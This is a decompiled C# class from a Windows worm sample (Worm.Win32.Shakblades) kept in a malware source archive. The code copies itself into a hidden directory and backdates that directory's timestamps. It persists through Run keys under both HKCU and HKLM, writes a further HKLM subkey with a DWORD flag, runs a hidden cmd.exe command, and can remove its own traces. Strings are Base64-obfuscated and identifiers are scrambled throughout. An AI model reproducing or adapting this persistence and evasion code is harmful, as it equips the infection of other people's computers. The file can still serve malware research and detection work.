MalwareSourceCode/MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f/ɱªᕢ᳭ᬻ˫ԧᵢ.cs

// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.ɱªᕢ᳭ᬻ˫ԧᵢ
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe

using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;

namespace Ҧ߲๒ʽ໙ୄᴘ
{
  internal class ɱªᕢ᳭ᬻ\u02EBԧᵢ
  {
    public static void ᅰ()
    {
      ɱªᕢ᳭ᬻ\u02EBԧᵢ.P();
      ɱªᕢ᳭ᬻ\u02EBԧᵢ.ᯁព();
      ɱªᕢ᳭ᬻ\u02EBԧᵢ.ᶏපϔẞ();
    }

    private static void P()
    {
      try
      {
        if (!Directory.Exists(ȩזြڹᡡỾỔው.ౡ\u000F))
          Directory.CreateDirectory(ȩזြڹᡡỾỔው.ౡ\u000F);
      }
      catch
      {
      }
      try
      {
        File.Copy(Process.GetCurrentProcess().MainModule.FileName, Path.Combine(ȩזြڹᡡỾỔው.ౡ\u000F, \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)), true);
      }
      catch
      {
      }
      try
      {
        if (ȩזြڹᡡỾỔው.\u09C7)
        {
          Random random = new Random();
          int day = random.Next(1, 28);
          int month = random.Next(1, 12);
          int year = random.Next(2000, DateTime.Now.Year);
          Directory.SetCreationTime(Path.Combine(ȩזြڹᡡỾỔው.ౡ\u000F, \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)), new DateTime(year, month, day));
        }
      }
      catch
      {
      }
      if (ȩזြڹᡡỾỔው.όᘂ\u1CCCᥓ\u005B)
      {
        try
        {
          File.SetAttributes(ȩזြڹᡡỾỔው.ౡ\u000F, FileAttributes.Hidden | FileAttributes.NotContentIndexed);
        }
        catch
        {
        }
      }
      if (!ȩזြڹᡡỾỔው.\u0B6E೮ᔙᩢ᷵ጔổ)
        return;
      try
      {
        File.SetAttributes(Path.Combine(ȩזြڹᡡỾỔው.ౡ\u000F, \u1928ᔾዔ.յ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)), FileAttributes.Hidden | FileAttributes.NotContentIndexed);
      }
      catch
      {
      }
    }

    public static void ᶏපϔẞ()
    {
      try
      {
        if (ȩזြڹᡡỾỔው.\u1C42\u193Eᙁᖔᠮ೬\u1BFB)
          Registry.CurrentUser.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FjIpNzokNSgfECwmNTI2Mik3HxosMcO+nOsnMjo2HwY4NTUoMTcZKDU2LDIxHxU4MQ==", true)).SetValue(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u1B65ᬧౢzƎ, true), (object) (ȩזြڹᡡỾỔው.ౡ\u000F + "\\" + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)));
      }
      catch
      {
      }
      try
      {
        if (ȩזြڹᡡỾỔው.கພ༢ਊȷඣᯇᝨ)
          Registry.LocalMachine.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FjIpNzokNSgfECwmNTI2Mik3HxosMcO+nOsnMjo2HwY4NTUoMTcZKDU2LDIxHxU4MQ==", true)).SetValue(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u1B65ᬧౢzƎ, true), (object) (ȩזြڹᡡỾỔው.ౡ\u000F + "\\" + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)));
      }
      catch
      {
      }
      try
      {
        if (!ȩזြڹᡡỾỔው.ԑᅤᴨᡰ\u02EFᣢỳ)
          return;
        RegistryKey subKey = Registry.LocalMachine.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FhIJFxoEFQgfECwmNTI2Mik3HwQmNyw5KOPDvpzrFig3ODMfDDE2NyQvLygn4wYyMDMyMSgxNzYf", true) + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.ụү᳗, true));
        subKey.SetValue("Fjc4JcO+nOsTJDcr", (object) (ȩזြڹᡡỾỔው.ౡ\u000F + "\\" + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)));
        subKey.SetValue("BjAGKzC99eEAMR4pKSIh", (object) 1, RegistryValueKind.DWord);
      }
      catch
      {
      }
    }

    private static void ᯁព()
    {
      try
      {
        Process process = new Process();
        process.StartInfo = new ProcessStartInfo()
        {
          FileName = "cmd.exe",
          UseShellExecute = false,
          RedirectStandardInput = true,
          CreateNoWindow = true,
          WindowStyle = ProcessWindowStyle.Hidden
        };
        process.Start();
        StreamWriter standardInput = process.StandardInput;
        standardInput.WriteLine("cd " + ȩזြڹᡡỾỔው.ౡ\u000F);
        standardInput.WriteLine(string.Format(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("KCYrMuMePTIxKBc1JDE2KSg1IB0yMSgMB8O+nOvjAOP14wHjPvNA/R0SEQjxLCcoMTcsKSwoNQ==", true), (object) \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)));
        standardInput.Close();
        process.Kill();
      }
      catch
      {
      }
    }

    public static void \u171D\u0018ẖေᒷᐦᵨỨ()
    {
      try
      {
        Registry.CurrentUser.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FjIpNzokNSgfECwmNTI2Mik3HxosMcO+nOsnMjo2HwY4NTUoMTcZKDU2LDIxHxU4MQ==", true)).DeleteValue(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u1B65ᬧౢzƎ, true));
      }
      catch
      {
      }
      try
      {
        Registry.LocalMachine.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FjIpNzokNSgfECwmNTI2Mik3HxosMcO+nOsnMjo2HwY4NTUoMTcZKDU2LDIxHxU4MQ==", true)).DeleteValue(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u02DBˬଋธ, true));
      }
      catch
      {
      }
      try
      {
        Registry.LocalMachine.DeleteSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FhIJFxoEFQgfECwmNTI2Mik3HwQmNyw5KOPDvpzrFig3ODMfDDE2NyQvLygn4wYyMDMyMSgxNzYf", true) + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.ụү᳗, true));
      }
      catch
      {
      }
      try
      {
        switch (ȩזြڹᡡỾỔው.Փᬃᜐᣖ̗ᨠᵴ)
        {
          case RegistryHive.CurrentUser:
            Registry.CurrentUser.DeleteSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ);
            break;
          case RegistryHive.LocalMachine:
            Registry.LocalMachine.DeleteSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ);
            break;
        }
      }
      catch
      {
      }
      ɱªᕢ᳭ᬻ\u02EBԧᵢ.\u0AFD();
    }

    public static void \u0AFD()
    {
      try
      {
        string tempFileName = Path.GetTempFileName();
        File.Delete(tempFileName);
        File.Move(Process.GetCurrentProcess().MainModule.FileName, tempFileName);
        \u0667Ѹ.\u1936\u0A50Ȁ\u0A84ᠬ\u1AE7(tempFileName, (string) null, \u0667Ѹ.ቩᩬᐜ̯ṅडၿ.ᑹ\u17FCנᒞ͍ሴǒ);
      }
      catch (Exception ex)
      {
      }
    }

    public enum \u0EF7ᶟᔂᢪĉᤘᢁַắ
    {
      የ᠖\u0E6Cᬰᥥ,
      ฏᆈǸ᱙Ȏ\u1CFD༾,
      \u05AFᩚၡ\u00F7ᩯ\u1B4Cጝ,
    }
  }
}